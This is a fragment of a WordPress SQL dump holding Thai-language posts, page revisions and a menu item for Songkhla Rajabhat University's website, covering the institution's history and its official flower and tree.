(601, 1, '2019-05-27 08:47:00', '2019-05-27 01:47:00', 'รองศาสตราจาย์ ดร.สุนทร  โสตถิพันธุ์\r\n\r\nดำรงตำแหน่งวันที่  27  กุมภาพันธ์ 2556 - ปัจจุบัน', 'รองศาสตราจาย์ ดร.สุนทร  โสตถิพันธุ์', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3-%e0%b9%82', '', '', '2019-05-27 08:47:00', '2019-05-27 01:47:00', '', 0, 'http://172.17.40.11/wp511/?p=601', 0, 'post', '', 0),
(602, 1, '2019-05-27 08:47:00', '2019-05-27 01:47:00', 'รองศาสตราจาย์ ดร.สุนทร  โสตถิพันธุ์\r\n\r\nดำรงตำแหน่งวันที่  27  กุมภาพันธ์ 2556 - ปัจจุบัน', 'รองศาสตราจาย์ ดร.สุนทร  โสตถิพันธุ์', '', 'inherit', 'closed', 'closed', '', '601-revision-v1', '', '', '2019-05-27 08:47:00', '2019-05-27 01:47:00', '', 601, 'http://172.17.40.11/wp511/?p=602', 0, 'revision', '', 0),
(603, 1, '2019-05-27 08:54:23', '2019-05-27 01:54:23', '<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา เป็นสถาบันอุดมศึกษาที่เก่าแก่ที่สุดแห่งหนึ่งของภาคใต้ และเป็นสถาบันที่มีพัฒนาการอย่างต่อเนื่องตลอดมา ตั้งแต่ยังมีฐานะเป็นเพียงโรงเรียนฝึกหัดครูมณฑล จนกระทั่งเป็นมหาวิทยาลัยราชภัฏสงขลา ดังเช่นปัจจุบัน\r\n\r\nในปีพ.ศ.2462เมื่อธรรมการมณฑลนครศรีธรรมราชซึ่งขณะนั้นอยู่ที่สงขลา และธรรมการจังหวัดสงขลาได้คิดผลิตครูมณฑลขึ้นเพื่อให้ไปทำหน้าที่สอนในระดับประถมศึกษาจึงได้จัดตั้งโรงเรียนฝึกหัดครูมณฑลขึ้น โดยให้เรียนร่วมกับโรงเรียนประจำมณฑลนครศรีธรรมราช(คือโรงเรียนมหาวชิราวุธซึ่งขณะนั้นตั้งอยู่ที่บริเวณโรงเรียนวิเชียรชมในปัจจุบัน) รับนักเรียน จบชั้นประถมบริบูรณ์(ประถมปีที่3)เข้าเรียนตามหลักสูตรป.4,ป.5และป.6โดยเพิ่มวิชาครูเป็นพิเศษผู้สำเร็จการศึกษาตามหลักสูตรดังกล่าวเรียกว่าครูประกาศนียบัตรมณฑล\r\n\r\nในปี พ.ศ. 2464 มีการประกาศใช้พระราชบัญญัติประถมศึกษา ธรรมการมณฑลจึงได้จัดตั้งโรงเรียนฝึกหัดครูประจำมณฑลขึ้นโดยเฉพาะเมื่อ พ.ศ. 2468 โดยตั้งที่ตำบลท่าชะมวง อำเภอกำแพงเพชร (ปัจจุบันคืออำเภอรัตภูมิ) จังหวัดสงขลา เรียกว่าโรงเรียนฝึกหัดครูมูล (ปัจจุบันเป็นที่ตั้งของวิทยาลัยเกษตรกรรมและเทคโนโลยีสงขลา) โดยรับนักเรียนที่จบ ม.3 หรือครูที่ทางอำเภอและจังหวัดต่าง ๆ ส่งมาเรียน กำหนด 2 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรวิชาชีพครูมูล(ป.)\r\n\r\nต่อมาได้มีพระราชบัญญัติว่าด้วยการบริหารแห่งราชอาณาจักรสยาม พ.ศ. 2476 ให้เลิกการแบ่งเขตการ ปกครองเป็นมณฑล โรงเรียนฝึกหัดครูมูลประจำ มณฑลนครศรีธรรมราชที่ท่าชะมวง จึงได้เปลี่ยนเป็นโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด เมื่อปี พ.ศ. 2477 โดยรับนักเรียนที่เรียน ป.6 หรือ ม.2 (ตามแผน การศึกษาแห่งชาติ พ.ศ. 2475) เข้าเรียนมีกำหนด 2 ปี ครั้น พ.ศ. 2482 จึงได้เปลี่ยนมาเป็นรับนักเรียน ม.3 เข้าเรียน มีกำหนด 2 ปี ผู้สำเร็จการศึกษาจะได้ประกาศ นียบัตรจังหวัด (ว.)\r\n\r\nนอกจากนี้โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด ยังรับนักเรียนที่เตรียมไว้เพื่อบรรจุเป็นครูประชาบาล ซึ่งทางจังหวัดต่าง ๆ ได้คัดเลือกนักเรียนที่จบ ป.4 จากตำบลทุรกันดารในจังหวัดนั้น ๆ มาเข้าเรียน มีกำหนด 3 ปี เมื่อสำเร็จการศึกษาแล้ว จะได้ประโยคครูประชาบาล (ป.บ.) และกลับไปเป็นครูในตำบลที่ตนมีภูมิ ลำเนาอยู่\r\n\r\nปี พ.ศ. 2482 โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดสงขลา ได้ย้ายจากท่าชะมวงมาเรียนที่ตำบลคอหงส์ อำเภอหาดใหญ่ และในปี พ.ศ. 2490 ก็เปลี่ยน ฐานะจากโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดเป็นโรงเรียนฝึกหัดครูมูลและมี การปรับปรุงหลักสูตรใหม่ โดยรับนักเรียนที่จบชั้นมัธยมปีที่ 6 หรือประโยคประกาศ นียบัตรครูมูล (ว.) เข้าเรียนต่ออีก 1 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรครูมูล (ป.)\r\n\r\nต่อมาใน พ.ศ. 2498 ก็ได้เปิดสอนหลักสูตรประกาศนียบัตรวิชาการศึกษา โดยรับนักเรียนที่จบ ม.6 เข้าเรียน 2 ปี ผู้สำเร็จการศึกษาจะได้รับประกาศนียบัตร วิชาการศึกษา (ป.กศ.) และโรงเรียนฝึกหัดครูมูลสงขลาก็เปลี่ยนเป็นโรงเรียนฝึกหัดครูสงขลา จนกระทั่งเมื่อวันที่ 1 มิถุนายน พ.ศ.2499 จึงได้ย้ายมาตั้งอยู่ ณ บริเวณ บ้านเขารูปช้าง อำเภอเมือง จังหวัดสงขลา อันเป็นสถานที่ตั้งในปัจจุบันและได้ยกฐานะเป็นวิทยาลัยครูสงขลา เมื่อวันที่ 1 พฤษภาคม พ.ศ. 2504 อีกทั้งได้ขยายชั้น เรียนไปจนถึงระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) ในปีเดียวกันนั้นเอง\r\n\r\nครั้นเมื่อถึงปี พ.ศ. 2518 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2518 ทำให้วิทยาลัยครูสงขลาเปิดสอนถึงระดับปริญญาตรี ในสาขาครุศาสตร์ โดยรับนักศึกษาที่เรียนจบ ป.กศ.สูง หรือครูประจำการ ที่ได้รับวุฒิ พ.ม. เข้าศึกษาต่อ 2 ปี ผู้สำเร็จการศึกษาจะได้รับวุฒิครุศาสตรบัณฑิต (ค.บ.) และในปี พ.ศ.2522 ก็ได้เปิดโครงการอบรมครูประจำการและบุคลากรทางการศึกษา (อ.ค.ป.)ในระดับ ป.กศ.ชั้นสูงและระดับปริญญาตรี (ค.บ.)หลังจากนั้นในปี พ.ศ.2524 ก็ได้ร่วมมือกับ มหาวิทยาลัยสงขลานครินทร์ เปิดสอนหลักสูตรการโรงแรมและการท่องเที่ยว กับหลักสูตรการเพาะเลี้ยงสัตว์น้ำโดยเรียกโครงการนี้ว่า วิทยาลัยชุมชนสงขลา\r\n\r\nต่อมาในปี พ.ศ.2527 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2527 ให้วิทยาลัยครูทำหน้าที่ผลิตครูและเปิดสอนวิชาชีพ ตามความต้องการและ ความจำเป็นของท้องถิ่น วิทยาลัยครูสงขลา จึงได้ผลิตครูระดับปริญญาตรี ครุศาสตรบัณฑิต และบัณฑิตหรือประกาศนียบัตรวิชาชีพอื่นๆ ตามความต้องการและความ จำเป็น ของท้องถิ่นตั้งแต่บัดนั้นเป็นต้นมา และในปี พ.ศ. 2529 ได้เปิดการศึกษาสำหรับบุคลากรประจำการ (กศ.บป.) ในระดับอนุปริญญาและระดับปริญญาตรีสาขา ครุศาสตร์ ซึ่งต่อมาก็ได้ขยายไปสู่สาขาอื่น ๆ คือ ศิลปศาสตร์ และ วิทยาศาสตร์ ดังที่เป็นอยู่ในปัจจุบัน\r\n\r\nประวัติศาสตร์แห่งการเปลี่ยนแปลงครั้งสำคัญ ของสถาบันการศึกษาแห่งนี้ได้เกิดขึ้นอีกครั้งเมื่อ พระบาทสมเด็จพระเจ้าอยู่หัว ทรงพระกรุณาโปรดเกล้า ฯ พระ- ราชทานนาม “ ราชภัฏ ” แทนชื่อวิทยาลัยครูทั่วประเทศ เมื่อวันที่ 14 กุมภาพันธ์ พ.ศ. 2535 ทำให้วิทยาลัยครูสงขลา เปลี่ยนชื่อ สถาบันราชภัฏสงขลา ตั้งแต่บัดนั้น เป็นต้นมา สถาบันราชภัฏสงขลาได้มีความเจริญก้าวหน้ามาเป็นลำดับ จนสามารถเปิดสอนถึงระดับบัณฑิตศึกษาได้ในปี พ.ศ. 2544 และเมื่อวันที่ 15 มิถุนายน พ.ศ. 2547 ก็ได้รับการยกฐานะเป็น มหาวิทยาลัยราชภัฏสงขลา ในที่สุด โดยผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์ ด้วงวิเศษ ดำรงตำแหน่งอธิการบดี', 'ประวัติมหาวิทยาลัยราชภัฏสงขลา', '', 'inherit', 'closed', 'closed', '', '17-revision-v1', '', '', '2019-05-27 08:54:23', '2019-05-27 01:54:23', '', 17, 'http://172.17.40.11/wp511/?p=603', 0, 'revision', '', 0),
(604, 1, '2019-05-27 08:55:10', '2019-05-27 01:55:10', '<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา เป็นสถาบันอุดมศึกษาที่เก่าแก่ที่สุดแห่งหนึ่งของภาคใต้ และเป็นสถาบันที่มีพัฒนาการอย่างต่อเนื่องตลอดมา ตั้งแต่ยังมีฐานะเป็นเพียงโรงเรียนฝึกหัดครูมณฑล จนกระทั่งเป็นมหาวิทยาลัยราชภัฏสงขลา ดังเช่นปัจจุบัน\r\n\r\nในปีพ.ศ.2462เมื่อธรรมการมณฑลนครศรีธรรมราชซึ่งขณะนั้นอยู่ที่สงขลา และธรรมการจังหวัดสงขลาได้คิดผลิตครูมณฑลขึ้นเพื่อให้ไปทำหน้าที่สอนในระดับประถมศึกษาจึงได้จัดตั้งโรงเรียนฝึกหัดครูมณฑลขึ้น โดยให้เรียนร่วมกับโรงเรียนประจำมณฑลนครศรีธรรมราช(คือโรงเรียนมหาวชิราวุธซึ่งขณะนั้นตั้งอยู่ที่บริเวณโรงเรียนวิเชียรชมในปัจจุบัน) รับนักเรียน จบชั้นประถมบริบูรณ์(ประถมปีที่3)เข้าเรียนตามหลักสูตรป.4,ป.5และป.6โดยเพิ่มวิชาครูเป็นพิเศษผู้สำเร็จการศึกษาตามหลักสูตรดังกล่าวเรียกว่าครูประกาศนียบัตรมณฑล\r\n\r\nในปี พ.ศ. 2464 มีการประกาศใช้พระราชบัญญัติประถมศึกษา ธรรมการมณฑลจึงได้จัดตั้งโรงเรียนฝึกหัดครูประจำมณฑลขึ้นโดยเฉพาะเมื่อ พ.ศ. 2468 โดยตั้งที่ตำบลท่าชะมวง อำเภอกำแพงเพชร (ปัจจุบันคืออำเภอรัตภูมิ) จังหวัดสงขลา เรียกว่าโรงเรียนฝึกหัดครูมูล (ปัจจุบันเป็นที่ตั้งของวิทยาลัยเกษตรกรรมและเทคโนโลยีสงขลา) โดยรับนักเรียนที่จบ ม.3 หรือครูที่ทางอำเภอและจังหวัดต่าง ๆ ส่งมาเรียน กำหนด 2 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรวิชาชีพครูมูล(ป.)\r\n\r\nต่อมาได้มีพระราชบัญญัติว่าด้วยการบริหารแห่งราชอาณาจักรสยาม พ.ศ. 2476 ให้เลิกการแบ่งเขตการ ปกครองเป็นมณฑล โรงเรียนฝึกหัดครูมูลประจำ มณฑลนครศรีธรรมราชที่ท่าชะมวง จึงได้เปลี่ยนเป็นโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด เมื่อปี พ.ศ. 2477 โดยรับนักเรียนที่เรียน ป.6 หรือ ม.2 (ตามแผน การศึกษาแห่งชาติ พ.ศ. 2475) เข้าเรียนมีกำหนด 2 ปี ครั้น พ.ศ. 2482 จึงได้เปลี่ยนมาเป็นรับนักเรียน ม.3 เข้าเรียน มีกำหนด 2 ปี ผู้สำเร็จการศึกษาจะได้ประกาศ นียบัตรจังหวัด (ว.)\r\n\r\nนอกจากนี้โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด ยังรับนักเรียนที่เตรียมไว้เพื่อบรรจุเป็นครูประชาบาล ซึ่งทางจังหวัดต่าง ๆ ได้คัดเลือกนักเรียนที่จบ ป.4 จากตำบลทุรกันดารในจังหวัดนั้น ๆ มาเข้าเรียน มีกำหนด 3 ปี เมื่อสำเร็จการศึกษาแล้ว จะได้ประโยคครูประชาบาล (ป.บ.) และกลับไปเป็นครูในตำบลที่ตนมีภูมิ ลำเนาอยู่\r\n\r\nปี พ.ศ. 2482 โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดสงขลา ได้ย้ายจากท่าชะมวงมาเรียนที่ตำบลคอหงส์ อำเภอหาดใหญ่ และในปี พ.ศ. 2490 ก็เปลี่ยน ฐานะจากโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดเป็นโรงเรียนฝึกหัดครูมูลและมี การปรับปรุงหลักสูตรใหม่ โดยรับนักเรียนที่จบชั้นมัธยมปีที่ 6 หรือประโยคประกาศ นียบัตรครูมูล (ว.) เข้าเรียนต่ออีก 1 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรครูมูล (ป.)\r\n\r\nต่อมาใน พ.ศ. 2498 ก็ได้เปิดสอนหลักสูตรประกาศนียบัตรวิชาการศึกษา โดยรับนักเรียนที่จบ ม.6 เข้าเรียน 2 ปี ผู้สำเร็จการศึกษาจะได้รับประกาศนียบัตร วิชาการศึกษา (ป.กศ.) และโรงเรียนฝึกหัดครูมูลสงขลาก็เปลี่ยนเป็นโรงเรียนฝึกหัดครูสงขลา จนกระทั่งเมื่อวันที่ 1 มิถุนายน พ.ศ.2499 จึงได้ย้ายมาตั้งอยู่ ณ บริเวณ บ้านเขารูปช้าง อำเภอเมือง จังหวัดสงขลา อันเป็นสถานที่ตั้งในปัจจุบันและได้ยกฐานะเป็นวิทยาลัยครูสงขลา เมื่อวันที่ 1 พฤษภาคม พ.ศ. 2504 อีกทั้งได้ขยายชั้น เรียนไปจนถึงระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) ในปีเดียวกันนั้นเอง\r\n\r\nครั้นเมื่อถึงปี พ.ศ. 2518 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2518 ทำให้วิทยาลัยครูสงขลาเปิดสอนถึงระดับปริญญาตรี ในสาขาครุศาสตร์ โดยรับนักศึกษาที่เรียนจบ ป.กศ.สูง หรือครูประจำการ ที่ได้รับวุฒิ พ.ม. เข้าศึกษาต่อ 2 ปี ผู้สำเร็จการศึกษาจะได้รับวุฒิครุศาสตรบัณฑิต (ค.บ.) และในปี พ.ศ.2522 ก็ได้เปิดโครงการอบรมครูประจำการและบุคลากรทางการศึกษา (อ.ค.ป.)ในระดับ ป.กศ.ชั้นสูงและระดับปริญญาตรี (ค.บ.)หลังจากนั้นในปี พ.ศ.2524 ก็ได้ร่วมมือกับ มหาวิทยาลัยสงขลานครินทร์ เปิดสอนหลักสูตรการโรงแรมและการท่องเที่ยว กับหลักสูตรการเพาะเลี้ยงสัตว์น้ำโดยเรียกโครงการนี้ว่า วิทยาลัยชุมชนสงขลา\r\n\r\nต่อมาในปี พ.ศ.2527 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2527 ให้วิทยาลัยครูทำหน้าที่ผลิตครูและเปิดสอนวิชาชีพ ตามความต้องการและ ความจำเป็นของท้องถิ่น วิทยาลัยครูสงขลา จึงได้ผลิตครูระดับปริญญาตรี ครุศาสตรบัณฑิต และบัณฑิตหรือประกาศนียบัตรวิชาชีพอื่นๆ ตามความต้องการและความ จำเป็น ของท้องถิ่นตั้งแต่บัดนั้นเป็นต้นมา และในปี พ.ศ. 2529 ได้เปิดการศึกษาสำหรับบุคลากรประจำการ (กศ.บป.) ในระดับอนุปริญญาและระดับปริญญาตรีสาขา ครุศาสตร์ ซึ่งต่อมาก็ได้ขยายไปสู่สาขาอื่น ๆ คือ ศิลปศาสตร์ และ วิทยาศาสตร์ ดังที่เป็นอยู่ในปัจจุบัน\r\n\r\nประวัติศาสตร์แห่งการเปลี่ยนแปลงครั้งสำคัญ ของสถาบันการศึกษาแห่งนี้ได้เกิดขึ้นอีกครั้งเมื่อ พระบาทสมเด็จพระเจ้าอยู่หัว ทรงพระกรุณาโปรดเกล้า ฯ พระ- ราชทานนาม “ ราชภัฏ ” แทนชื่อวิทยาลัยครูทั่วประเทศ เมื่อวันที่ 14 กุมภาพันธ์ พ.ศ. 2535 ทำให้วิทยาลัยครูสงขลา เปลี่ยนชื่อ สถาบันราชภัฏสงขลา ตั้งแต่บัดนั้น เป็นต้นมา สถาบันราชภัฏสงขลาได้มีความเจริญก้าวหน้ามาเป็นลำดับ จนสามารถเปิดสอนถึงระดับบัณฑิตศึกษาได้ในปี พ.ศ. 2544 และเมื่อวันที่ 15 มิถุนายน พ.ศ. 2547 ก็ได้รับการยกฐานะเป็น มหาวิทยาลัยราชภัฏสงขลา ในที่สุด โดยผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์ ด้วงวิเศษ ดำรงตำแหน่งอธิการบดี', 'ประวัติมหาวิทยาลัยราชภัฏสงขลา', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a1%e0%b8%ab%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%a0', '', '', '2019-05-27 08:55:10', '2019-05-27 01:55:10', '', 0, 'http://172.17.40.11/wp511/?page_id=604', 0, 'page', '', 0),
(605, 1, '2019-05-27 08:55:10', '2019-05-27 01:55:10', '<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา เป็นสถาบันอุดมศึกษาที่เก่าแก่ที่สุดแห่งหนึ่งของภาคใต้ และเป็นสถาบันที่มีพัฒนาการอย่างต่อเนื่องตลอดมา ตั้งแต่ยังมีฐานะเป็นเพียงโรงเรียนฝึกหัดครูมณฑล จนกระทั่งเป็นมหาวิทยาลัยราชภัฏสงขลา ดังเช่นปัจจุบัน\r\n\r\nในปีพ.ศ.2462เมื่อธรรมการมณฑลนครศรีธรรมราชซึ่งขณะนั้นอยู่ที่สงขลา และธรรมการจังหวัดสงขลาได้คิดผลิตครูมณฑลขึ้นเพื่อให้ไปทำหน้าที่สอนในระดับประถมศึกษาจึงได้จัดตั้งโรงเรียนฝึกหัดครูมณฑลขึ้น โดยให้เรียนร่วมกับโรงเรียนประจำมณฑลนครศรีธรรมราช(คือโรงเรียนมหาวชิราวุธซึ่งขณะนั้นตั้งอยู่ที่บริเวณโรงเรียนวิเชียรชมในปัจจุบัน) รับนักเรียน จบชั้นประถมบริบูรณ์(ประถมปีที่3)เข้าเรียนตามหลักสูตรป.4,ป.5และป.6โดยเพิ่มวิชาครูเป็นพิเศษผู้สำเร็จการศึกษาตามหลักสูตรดังกล่าวเรียกว่าครูประกาศนียบัตรมณฑล\r\n\r\nในปี พ.ศ. 2464 มีการประกาศใช้พระราชบัญญัติประถมศึกษา ธรรมการมณฑลจึงได้จัดตั้งโรงเรียนฝึกหัดครูประจำมณฑลขึ้นโดยเฉพาะเมื่อ พ.ศ. 2468 โดยตั้งที่ตำบลท่าชะมวง อำเภอกำแพงเพชร (ปัจจุบันคืออำเภอรัตภูมิ) จังหวัดสงขลา เรียกว่าโรงเรียนฝึกหัดครูมูล (ปัจจุบันเป็นที่ตั้งของวิทยาลัยเกษตรกรรมและเทคโนโลยีสงขลา) โดยรับนักเรียนที่จบ ม.3 หรือครูที่ทางอำเภอและจังหวัดต่าง ๆ ส่งมาเรียน กำหนด 2 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรวิชาชีพครูมูล(ป.)\r\n\r\nต่อมาได้มีพระราชบัญญัติว่าด้วยการบริหารแห่งราชอาณาจักรสยาม พ.ศ. 2476 ให้เลิกการแบ่งเขตการ ปกครองเป็นมณฑล โรงเรียนฝึกหัดครูมูลประจำ มณฑลนครศรีธรรมราชที่ท่าชะมวง จึงได้เปลี่ยนเป็นโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด เมื่อปี พ.ศ. 2477 โดยรับนักเรียนที่เรียน ป.6 หรือ ม.2 (ตามแผน การศึกษาแห่งชาติ พ.ศ. 2475) เข้าเรียนมีกำหนด 2 ปี ครั้น พ.ศ. 2482 จึงได้เปลี่ยนมาเป็นรับนักเรียน ม.3 เข้าเรียน มีกำหนด 2 ปี ผู้สำเร็จการศึกษาจะได้ประกาศ นียบัตรจังหวัด (ว.)\r\n\r\nนอกจากนี้โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด ยังรับนักเรียนที่เตรียมไว้เพื่อบรรจุเป็นครูประชาบาล ซึ่งทางจังหวัดต่าง ๆ ได้คัดเลือกนักเรียนที่จบ ป.4 จากตำบลทุรกันดารในจังหวัดนั้น ๆ มาเข้าเรียน มีกำหนด 3 ปี เมื่อสำเร็จการศึกษาแล้ว จะได้ประโยคครูประชาบาล (ป.บ.) และกลับไปเป็นครูในตำบลที่ตนมีภูมิ ลำเนาอยู่\r\n\r\nปี พ.ศ. 2482 โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดสงขลา ได้ย้ายจากท่าชะมวงมาเรียนที่ตำบลคอหงส์ อำเภอหาดใหญ่ และในปี พ.ศ. 2490 ก็เปลี่ยน ฐานะจากโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดเป็นโรงเรียนฝึกหัดครูมูลและมี การปรับปรุงหลักสูตรใหม่ โดยรับนักเรียนที่จบชั้นมัธยมปีที่ 6 หรือประโยคประกาศ นียบัตรครูมูล (ว.) เข้าเรียนต่ออีก 1 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรครูมูล (ป.)\r\n\r\nต่อมาใน พ.ศ. 2498 ก็ได้เปิดสอนหลักสูตรประกาศนียบัตรวิชาการศึกษา โดยรับนักเรียนที่จบ ม.6 เข้าเรียน 2 ปี ผู้สำเร็จการศึกษาจะได้รับประกาศนียบัตร วิชาการศึกษา (ป.กศ.) และโรงเรียนฝึกหัดครูมูลสงขลาก็เปลี่ยนเป็นโรงเรียนฝึกหัดครูสงขลา จนกระทั่งเมื่อวันที่ 1 มิถุนายน พ.ศ.2499 จึงได้ย้ายมาตั้งอยู่ ณ บริเวณ บ้านเขารูปช้าง อำเภอเมือง จังหวัดสงขลา อันเป็นสถานที่ตั้งในปัจจุบันและได้ยกฐานะเป็นวิทยาลัยครูสงขลา เมื่อวันที่ 1 พฤษภาคม พ.ศ. 2504 อีกทั้งได้ขยายชั้น เรียนไปจนถึงระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) ในปีเดียวกันนั้นเอง\r\n\r\nครั้นเมื่อถึงปี พ.ศ. 2518 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2518 ทำให้วิทยาลัยครูสงขลาเปิดสอนถึงระดับปริญญาตรี ในสาขาครุศาสตร์ โดยรับนักศึกษาที่เรียนจบ ป.กศ.สูง หรือครูประจำการ ที่ได้รับวุฒิ พ.ม. เข้าศึกษาต่อ 2 ปี ผู้สำเร็จการศึกษาจะได้รับวุฒิครุศาสตรบัณฑิต (ค.บ.) และในปี พ.ศ.2522 ก็ได้เปิดโครงการอบรมครูประจำการและบุคลากรทางการศึกษา (อ.ค.ป.)ในระดับ ป.กศ.ชั้นสูงและระดับปริญญาตรี (ค.บ.)หลังจากนั้นในปี พ.ศ.2524 ก็ได้ร่วมมือกับ มหาวิทยาลัยสงขลานครินทร์ เปิดสอนหลักสูตรการโรงแรมและการท่องเที่ยว กับหลักสูตรการเพาะเลี้ยงสัตว์น้ำโดยเรียกโครงการนี้ว่า วิทยาลัยชุมชนสงขลา\r\n\r\nต่อมาในปี พ.ศ.2527 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2527 ให้วิทยาลัยครูทำหน้าที่ผลิตครูและเปิดสอนวิชาชีพ ตามความต้องการและ ความจำเป็นของท้องถิ่น วิทยาลัยครูสงขลา จึงได้ผลิตครูระดับปริญญาตรี ครุศาสตรบัณฑิต และบัณฑิตหรือประกาศนียบัตรวิชาชีพอื่นๆ ตามความต้องการและความ จำเป็น ของท้องถิ่นตั้งแต่บัดนั้นเป็นต้นมา และในปี พ.ศ. 2529 ได้เปิดการศึกษาสำหรับบุคลากรประจำการ (กศ.บป.) ในระดับอนุปริญญาและระดับปริญญาตรีสาขา ครุศาสตร์ ซึ่งต่อมาก็ได้ขยายไปสู่สาขาอื่น ๆ คือ ศิลปศาสตร์ และ วิทยาศาสตร์ ดังที่เป็นอยู่ในปัจจุบัน\r\n\r\nประวัติศาสตร์แห่งการเปลี่ยนแปลงครั้งสำคัญ ของสถาบันการศึกษาแห่งนี้ได้เกิดขึ้นอีกครั้งเมื่อ พระบาทสมเด็จพระเจ้าอยู่หัว ทรงพระกรุณาโปรดเกล้า ฯ พระ- ราชทานนาม “ ราชภัฏ ” แทนชื่อวิทยาลัยครูทั่วประเทศ เมื่อวันที่ 14 กุมภาพันธ์ พ.ศ. 2535 ทำให้วิทยาลัยครูสงขลา เปลี่ยนชื่อ สถาบันราชภัฏสงขลา ตั้งแต่บัดนั้น เป็นต้นมา สถาบันราชภัฏสงขลาได้มีความเจริญก้าวหน้ามาเป็นลำดับ จนสามารถเปิดสอนถึงระดับบัณฑิตศึกษาได้ในปี พ.ศ. 2544 และเมื่อวันที่ 15 มิถุนายน พ.ศ. 2547 ก็ได้รับการยกฐานะเป็น มหาวิทยาลัยราชภัฏสงขลา ในที่สุด โดยผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์ ด้วงวิเศษ ดำรงตำแหน่งอธิการบดี', 'ประวัติมหาวิทยาลัยราชภัฏสงขลา', '', 'inherit', 'closed', 'closed', '', '604-revision-v1', '', '', '2019-05-27 08:55:10', '2019-05-27 01:55:10', '', 604, 'http://172.17.40.11/wp511/?p=605', 0, 'revision', '', 0),
(607, 1, '2019-05-27 08:56:43', '2019-05-27 01:56:43', ' ', '', '', 'publish', 'closed', 'closed', '', '607', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=607', 2, 'nav_menu_item', '', 0),
(608, 1, '2019-05-27 09:07:22', '2019-05-27 02:07:22', '<p style="text-align: center;"><span style="color: #0000ff;"><strong>ดอกไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</strong></span></p>\r\n<img class="size-medium wp-image-83 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/fw01-300x195.jpg" alt="" width="300" height="195" />\r\n<p style="text-align: center;">ดอกปาริฉัตร</p>\r\n&nbsp;\r\n<p style="text-align: center;"><strong><span style="color: #0000ff;">ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</span></strong></p>\r\n<img class="size-medium wp-image-84 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/salapee-225x300.jpg" alt="" width="225" height="300" />\r\n<p style="text-align: center;">ต้นสารภี</p>\r\nสารภี : ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา\r\n\r\nต้นไม้ชายฝั่งทะเล ที่ทรงคุณค่า มีลำต้นที่แข็งแกร่ง ทนทาน กลิ่นดอกที่หอมละมุน อ่อนหวาน ให้คุณประโยชน์ทั้งใช้ทำเป็นที่อยู่อาศัย\r\n\r\nและเป็นยา มหาวิทยาลัยราชภัฏสงขลา ซึ่งเป็นแหล่งที่พึ่งพิงหลักด้านวิทยาการท้องถิ่น จึงได้นำมาเป็นต้นไม้ประจำมหาวิทยาลัย', 'ดอกไม้และต้นไม้ประจำมหาวิทยาลัย', '', 'publish', 'closed', 'closed', '', '%e0%b8%94%e0%b8%ad%e0%b8%81%e0%b9%84%e0%b8%a1%e0%b9%89%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%a1%e0%b8%ab', '', '', '2019-05-27 09:07:22', '2019-05-27 02:07:22', '', 0, 'http://172.17.40.11/wp511/?page_id=608', 0, 'page', '', 0),
